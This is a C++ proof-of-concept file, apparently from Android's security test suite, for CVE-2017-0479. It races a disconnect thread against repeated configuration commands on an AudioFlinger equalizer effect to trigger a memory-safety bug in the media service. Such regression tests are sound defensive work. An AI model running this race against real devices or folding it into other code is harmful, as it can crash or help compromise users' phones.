1 /**
2  * Copyright (C) 2018 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 #include <sys/types.h>
17 #include <sys/wait.h>
18 #include <stdlib.h>
19 
20 #define LOG_TAG "CVE-2017-0479"
21 
22 #include <android/content/AttributionSourceState.h>
23 #include <android/media/BnEffectClient.h>
24 #include <android/media/IEffect.h>
25 #include <hardware/audio_effect.h>
26 #include <log/log.h>
27 #include <media/AidlConversion.h>
28 #include <media/AudioSystem.h>
29 #include <media/IAudioFlinger.h>
30 
31 using namespace android;
32 using media::IEffect;
33 
34 struct EffectClient : public media::BnEffectClient {
EffectClientEffectClient35   EffectClient() {}
controlStatusChangedEffectClient36   virtual binder::Status controlStatusChanged(bool controlGranted __unused) {
37     return binder::Status::ok();
38   }
39 
enableStatusChangedEffectClient40   virtual binder::Status enableStatusChanged(bool enabled __unused) {
41     return binder::Status::ok();
42   }
43 
commandExecutedEffectClient44   virtual binder::Status commandExecuted(int32_t cmdCode __unused,
45       const std::vector<uint8_t>& cmdData __unused,
46       const std::vector<uint8_t>& replyData __unused) {
47     return binder::Status::ok();
48   }
49 
framesProcessedEffectClient50   virtual binder::Status framesProcessed(int32_t frames __unused) override {
51       return binder::Status::ok();
52   }
53 };
54 
55 sp<IEffect> gEffect;
56 
disconnectThread(void *)57 void *disconnectThread(void *) {
58   usleep(5);
59   if (gEffect != NULL && gEffect.get() != NULL) {
60     gEffect->disconnect();
61   }
62   return NULL;
63 }
64 
main()65 int main() {
66   static const effect_uuid_t EFFECT_UIID_EQUALIZER = {
67       0x0bed4300, 0xddd6, 0x11db, 0x8f34, {0x00, 0x02, 0xa5, 0xd5, 0xc5, 0x1b}};
68 
69   effect_descriptor_t descriptor;
70   memset(&descriptor, 0, sizeof(descriptor));
71   descriptor.type = EFFECT_UIID_EQUALIZER;
72   descriptor.uuid = *EFFECT_UUID_NULL;
73   sp<EffectClient> effectClient(new EffectClient());
74 
75   const int32_t priority = 0;
76   audio_session_t sessionId = (audio_session_t)(128);
77   const audio_io_handle_t io = AUDIO_IO_HANDLE_NONE;
78   const std::string opPackageName("com.exp.poc");
79   int32_t id;
80   int i, enabled;
81   status_t err;
82 
83   std::vector<uint8_t> cmdData;
84   std::vector<uint8_t> replyData;
85 
86   gEffect = NULL;
87   pthread_t pt;
88   const sp<IAudioFlinger> &audioFlinger = AudioSystem::get_audio_flinger();
89   AudioDeviceTypeAddr device;
90   android::content::AttributionSourceState attributionSource;
91   attributionSource.packageName = opPackageName;
92   attributionSource.pid = VALUE_OR_RETURN_STATUS(legacy2aidl_pid_t_int32_t(getpid()));
93 
94   for (i=0; i<100; i++) {
95     media::CreateEffectRequest request;
96     request.desc = VALUE_OR_RETURN_STATUS(
97             legacy2aidl_effect_descriptor_t_EffectDescriptor(descriptor));
98     request.client = effectClient;
99     request.priority = priority;
100     request.output = VALUE_OR_RETURN_STATUS(legacy2aidl_audio_io_handle_t_int32_t(io));
101     request.sessionId = VALUE_OR_RETURN_STATUS(legacy2aidl_audio_session_t_int32_t(sessionId));
102     request.device = VALUE_OR_RETURN_STATUS(legacy2aidl_AudioDeviceTypeAddress(device));
103     request.attributionSource = attributionSource;
104     request.probe = false;
105 
106     media::CreateEffectResponse response;
107 
108     err = audioFlinger->createEffect(request, &response);
109 
110     if (err == OK) {
111         id = response.id;
112         enabled = response.enabled;
113         gEffect = response.effect;
114         descriptor = VALUE_OR_RETURN_STATUS(
115                 aidl2legacy_EffectDescriptor_effect_descriptor_t(response.desc));
116     }
117 
118     if (gEffect == NULL || err != NO_ERROR) {
119       return -1;
120     }
121     pthread_create(&pt, NULL, disconnectThread, NULL);
122     binder::Status status = gEffect->command(EFFECT_CMD_GET_CONFIG, cmdData,
123                                              sizeof(effect_config_t),
124                                              &replyData, &err);
125     if (!status.isOk()) {
126       err = status.transactionError();
127     }
128     usleep(50);
129   }
130   sleep(2);
131   return 0;
132 }
133